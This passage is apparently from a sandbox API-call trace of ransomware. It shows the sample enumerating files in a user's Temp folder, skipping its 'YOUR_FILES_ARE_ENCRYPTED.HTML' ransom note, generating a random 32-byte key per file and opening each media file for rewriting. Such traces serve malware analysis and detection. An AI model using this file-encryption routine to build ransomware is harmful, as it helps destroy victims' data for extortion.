returned 2 [0122.037] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="85") returned 2 [0122.037] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="9B") returned 2 [0122.037] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="34") returned 2 [0122.037] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="12") returned 2 [0122.037] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="6B") returned 2 [0122.037] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="BA") returned 2 [0122.037] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="5C") returned 2 [0122.037] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="3A") returned 2 [0122.037] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="68") returned 2 [0122.037] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="3B") returned 2 [0122.037] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="43") returned 2 [0122.037] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="F6") returned 2 [0122.037] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="9C") returned 2 [0122.037] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="DA") returned 2 [0122.037] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="58") returned 2 [0122.037] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="C0") returned 2 [0122.037] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="EA") returned 2 [0122.037] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="11") returned 2 [0122.037] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="88") returned 2 [0122.037] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="2C") returned 2 [0122.037] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4F") returned 2 [0122.038] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav" [0122.038] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.038] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.042] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37ad79a0, ftCreationTime.dwHighDateTime=0x1d70884, ftLastAccessTime.dwLowDateTime=0x22b9bde0, ftLastAccessTime.dwHighDateTime=0x1d709f3, ftLastWriteTime.dwLowDateTime=0x22b9bde0, ftLastWriteTime.dwHighDateTime=0x1d709f3, nFileSizeHigh=0x0, nFileSizeLow=0x656e, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="DHT-H7PYbtrzMxg.bmp", cAlternateFileName="DHT-H7~1.BMP")) returned 1 [0122.042] StrStrIW (lpFirst="DHT-H7PYbtrzMxg.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.042] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp") returned 64 [0122.042] PathFindExtensionW (pszPath="DHT-H7PYbtrzMxg.bmp") returned=".bmp" [0122.042] lstrlenW (lpString=".bmp") returned 4 [0122.042] PathFindExtensionW (pszPath="DHT-H7PYbtrzMxg.bmp") returned=".bmp" [0122.042] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dht-h7pybtrzmxg.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.043] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=25966) returned 1 [0122.043] GetProcessHeap () returned 0x600000 [0122.043] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.044] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="25") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="DB") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="12") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="51") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="9B") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="1D") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="2F") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="22") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="51") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="69") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="4B") returned 2 [0122.044] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="D2") returned 2 [0122.044] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="74") returned 2 [0122.044] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="A9") returned 2 [0122.044] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="38") returned 2 [0122.044] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="70") returned 2 [0122.044] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="3F") returned 2 [0122.044] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="66") returned 2 [0122.044] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="BB") returned 2 [0122.044] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="80") returned 2 [0122.044] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="01") returned 2 [0122.044] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="34") returned 2 [0122.044] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="58") returned 2 [0122.044] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="46") returned 2 [0122.044] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="CE") returned 2 [0122.045] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="2B") returned 2 [0122.045] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="9C") returned 2 [0122.045] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="0A") returned 2 [0122.045] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="1E") returned 2 [0122.045] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="72") returned 2 [0122.045] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="C4") returned 2 [0122.045] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="22") returned 2 [0122.045] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp" [0122.045] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.045] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.049] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebff4a30, ftCreationTime.dwHighDateTime=0x1d704e4, ftLastAccessTime.dwLowDateTime=0x23224980, ftLastAccessTime.dwHighDateTime=0x1d7071b, ftLastWriteTime.dwLowDateTime=0x23224980, ftLastWriteTime.dwHighDateTime=0x1d7071b, nFileSizeHigh=0x0, nFileSizeLow=0x955b, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Diboyxb.m4a", cAlternateFileName="")) returned 1 [0122.049] StrStrIW (lpFirst="Diboyxb.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.049] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a") returned 56 [0122.049] PathFindExtensionW (pszPath="Diboyxb.m4a") returned=".m4a" [0122.049] lstrlenW (lpString=".m4a") returned 4 [0122.049] PathFindExtensionW (pszPath="Diboyxb.m4a") returned=".m4a" [0122.049] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\diboyxb.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.050] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=38235) returned 1 [0122.050] GetProcessHeap () returned 0x600000 [0122.050] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.051] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="EB") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="5E") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="09") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="82") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="92") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="98") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="05") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="57") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="AB") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="01") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="FC") returned 2 [0122.051] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="46") returned 2 [0122.051] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="9C") returned 2 [0122.051] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="C6") returned 2 [0122.051] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="42") returned 2 [0122.051] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="13") returned 2 [0122.051] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="C1") returned 2 [0122.051] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="8D") returned 2 [0122.051] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="79") returned 2 [0122.051] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="7E") returned 2 [0122.051] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="CB") returned 2 [0122.051] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="6C") returned 2 [0122.051] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="E0") returned 2 [0122.051] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="5A") returned 2 [0122.051] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="80") returned 2 [0122.051] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="D0") returned 2 [0122.052] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="E6") returned 2 [0122.052] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="98") returned 2 [0122.052] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="55") returned 2 [0122.052] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="09") returned 2 [0122.052] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="53") returned 2 [0122.052] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="31") returned 2 [0122.052] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a" [0122.052] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.052] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.056] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaee26a0, ftCreationTime.dwHighDateTime=0x1d6fbf6, ftLastAccessTime.dwLowDateTime=0x6fe66810, ftLastAccessTime.dwHighDateTime=0x1d703af, ftLastWriteTime.dwLowDateTime=0x6fe66810, ftLastWriteTime.dwHighDateTime=0x1d703af, nFileSizeHigh=0x0, nFileSizeLow=0x13183, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="EE87_ApRg.flv", cAlternateFileName="EE87_A~1.FLV")) returned 1 [0122.057] StrStrIW (lpFirst="EE87_ApRg.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.057] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv") returned 58 [0122.057] PathFindExtensionW (pszPath="EE87_ApRg.flv") returned=".flv" [0122.057] lstrlenW (lpString=".flv") returned 4 [0122.057] PathFindExtensionW (pszPath="EE87_ApRg.flv") returned=".flv" [0122.057] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ee87_aprg.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.058] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=78211) returned 1 [0122.058] GetProcessHeap () returned 0x600000 [0122.058] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.060] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="3F") returned 2 [0122.060] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="A1") returned 2 [0122.060] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="8D") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="46") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="91") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="37") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="AF") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="74") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="B6") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="7F") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="41") returned 2 [0122.061] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="39") returned 2 [0122.061] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="BF") returned 2 [0122.061] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="60") returned 2 [0122.061] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="E0") returned 2 [0122.061] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="46") returned 2 [0122.061] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="E5") returned 2 [0122.061] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="04") returned 2 [0122.061] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="60") returned 2 [0122.061] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="5A") returned 2 [0122.061] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="01") returned 2 [0122.061] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="A2") returned 2 [0122.061] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="94") returned 2 [0122.061] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="04") returned 2 [0122.061] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="55") returned 2 [0122.061] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="04") returned 2 [0122.061] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="3F") returned 2 [0122.061] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="6E") returned 2 [0122.061] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="57") returned 2 [0122.061] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="E9") returned 2 [0122.061] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="A0") returned 2 [0122.061] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="25") returned 2 [0122.062] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv" [0122.062] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.062] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.066] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e78a040, ftCreationTime.dwHighDateTime=0x1d70905, ftLastAccessTime.dwLowDateTime=0x4bb2fb30, ftLastAccessTime.dwHighDateTime=0x1d70a3e, ftLastWriteTime.dwLowDateTime=0x4bb2fb30, ftLastWriteTime.dwHighDateTime=0x1d70a3e, nFileSizeHigh=0x0, nFileSizeLow=0x9f8e, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="f4IlzxrUDx.jpg", cAlternateFileName="F4ILZX~1.JPG")) returned 1 [0122.066] StrStrIW (lpFirst="f4IlzxrUDx.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.066] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg") returned 59 [0122.066] PathFindExtensionW (pszPath="f4IlzxrUDx.jpg") returned=".jpg" [0122.066] lstrlenW (lpString=".jpg") returned 4 [0122.066] PathFindExtensionW (pszPath="f4IlzxrUDx.jpg") returned=".jpg" [0122.066] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\f4ilzxrudx.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.067] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=40846) returned 1 [0122.067] GetProcessHeap () returned 0x600000 [0122.067] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.067] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="52") returned 2 [0122.067] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="E4") returned 2 [0122.067] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="A6") returned 2 [0122.067] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="6A") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="F6") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="83") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="2E") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="C2") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="3F") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="C0") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="23") returned 2 [0122.068] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="4F") returned 2 [0122.068] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="40") returned 2 [0122.068] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="CF") returned 2 [0122.068] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="73") returned 2 [0122.068] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="82") returned 2 [0122.068] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="52") returned 2 [0122.068] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="A2") returned 2 [0122.068] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="BF") returned 2 [0122.068] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="9D") returned 2 [0122.068] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="13") returned 2 [0122.068] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="8A") returned 2 [0122.068] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="A0") returned 2 [0122.068] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="4B") returned 2 [0122.068] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="42") returned 2 [0122.068] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="82") returned 2 [0122.068] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="98") returned 2 [0122.068] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="55") returned 2 [0122.068] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="78") returned 2 [0122.068] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="A7") returned 2 [0122.068] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="E6") returned 2 [0122.068] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="5B") returned 2 [0122.069] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg" [0122.069] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.069] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.070] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5b7e290, ftCreationTime.dwHighDateTime=0x1d6fbc3, ftLastAccessTime.dwLowDateTime=0xdc0e0ec0, ftLastAccessTime.dwHighDateTime=0x1d70653, ftLastWriteTime.dwLowDateTime=0xdc0e0ec0, ftLastWriteTime.dwHighDateTime=0x1d70653, nFileSizeHigh=0x0, nFileSizeLow=0x17f26, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="GcjMwU.mp3", cAlternateFileName="")) returned 1 [0122.073] StrStrIW (lpFirst="GcjMwU.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.073] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3") returned 55 [0122.073] PathFindExtensionW (pszPath="GcjMwU.mp3") returned=".mp3" [0122.073] lstrlenW (lpString=".mp3") returned 4 [0122.073] PathFindExtensionW (pszPath="GcjMwU.mp3") returned=".mp3" [0122.073] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\gcjmwu.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.074] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=98086) returned 1 [0122.074] GetProcessHeap () returned 0x600000 [0122.074] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.074] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="05") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="37") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="26") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="DF") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="EC") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="DF") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="91") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="04") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="56") returned 2 [0122.074] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: 